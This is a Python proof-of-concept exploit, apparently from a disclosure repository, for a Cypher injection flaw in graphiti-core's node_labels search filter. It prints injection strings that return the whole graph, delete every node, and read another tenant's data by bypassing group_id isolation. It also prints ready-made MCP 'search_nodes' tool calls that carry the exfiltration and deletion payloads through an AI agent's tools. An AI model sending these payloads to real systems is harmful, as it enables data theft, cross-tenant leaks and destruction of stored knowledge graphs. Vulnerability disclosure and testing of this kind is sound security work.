README.md
Rendering markdown...
#!/usr/bin/env python3
"""
PoC: Cypher Injection via node_labels in graphiti-core (getzep/graphiti)
CVE-2026-32247 — CVSS 8.1
Vulnerability: search_filters.py joins user-supplied node_labels with '|' and
concatenates them into a raw Cypher WHERE clause without sanitization.
Affected: graphiti-core <= 0.28.1
Fixed in: 0.28.2
File: graphiti_core/search/search_filters.py (lines 91-92, 134-135)
"""
import json
def build_filter(node_labels: list[str]) -> str:
    """Reproduce the vulnerable label-filter logic from search_filters.py:91-92.

    The labels are joined with ``|`` and appended to ``n:`` exactly as
    supplied. No escaping or validation is applied; that omission is
    deliberate here, because this function exists to demonstrate the
    injection rather than to prevent it.

    Args:
        node_labels: Labels to join; each one is used verbatim.

    Returns:
        The fragment ``n:<label1>|<label2>|...``. An empty list yields
        ``"n:"``.
    """
    labels = "|".join(node_labels)
    return "n:" + labels
def demo_injection() -> None:
    """Print the filter fragments and MCP payloads that demonstrate the injection.

    Nothing is executed against a database: every payload is passed through
    ``build_filter`` and the resulting strings are written to stdout, followed
    by two JSON-encoded ``search_nodes`` tool calls carrying the same payloads.
    """
    print("=" * 60)
    print("CVE-2026-32247 — Cypher Injection in graphiti-core")
    print("=" * 60)
    print()

    # --- Benign usage ---
    benign = build_filter(["Person", "Organization"])
    print(f"[+] Benign filter : {benign}")
    print(f" Cypher context : WHERE ({benign}) AND ...")
    print()

    # --- PoC 1: Full graph exfiltration ---
    exfil_payload = ["Entity`) WITH n MATCH (x) RETURN x //"]
    exfil = build_filter(exfil_payload)
    print(f"[!] Exfil filter : {exfil}")
    full_cypher_exfil = f"MATCH (n) WHERE ({exfil}) AND n.group_id = $group_id RETURN n"
    print(" Full Cypher :")
    print(f" {full_cypher_exfil}")
    print(" ↑ The ) closes the WHERE, WITH pipelines a new MATCH, // drops the rest")
    print()

    # --- PoC 2: Full graph deletion ---
    delete_payload = ["Entity`) WITH n MATCH (x) DETACH DELETE x //"]
    delete_filter = build_filter(delete_payload)
    print(f"[!] Delete filter : {delete_filter}")
    print()

    # --- PoC 3: Cross-tenant exfiltration (bypass group_id isolation) ---
    cross_tenant = ["Entity`) WITH n MATCH (victim) WHERE victim.group_id = 'target_group' RETURN victim //"]
    ct_filter = build_filter(cross_tenant)
    # Only the first 80 characters are shown to keep the line readable.
    print(f"[!] XTenant filter : {ct_filter[:80]}...")
    print()

    # --- MCP tool call payloads ---
    print("-" * 60)
    print("MCP tool call to trigger via search_nodes:")
    print()
    # The tool calls reuse the payload lists defined above so the printed JSON
    # cannot drift from the filters demonstrated earlier.
    tool_call = {
        "tool": "search_nodes",
        "arguments": {
            "query": "anything",
            "entity_types": exfil_payload,
        },
    }
    print(json.dumps(tool_call, indent=2))
    print()
    tool_call_delete = {
        "tool": "search_nodes",
        "arguments": {
            "query": "anything",
            "entity_types": delete_payload,
        },
    }
    print("Destructive variant:")
    print(json.dumps(tool_call_delete, indent=2))
# Run the demonstration only when executed as a script, not when imported.
if __name__ == "__main__":
    demo_injection()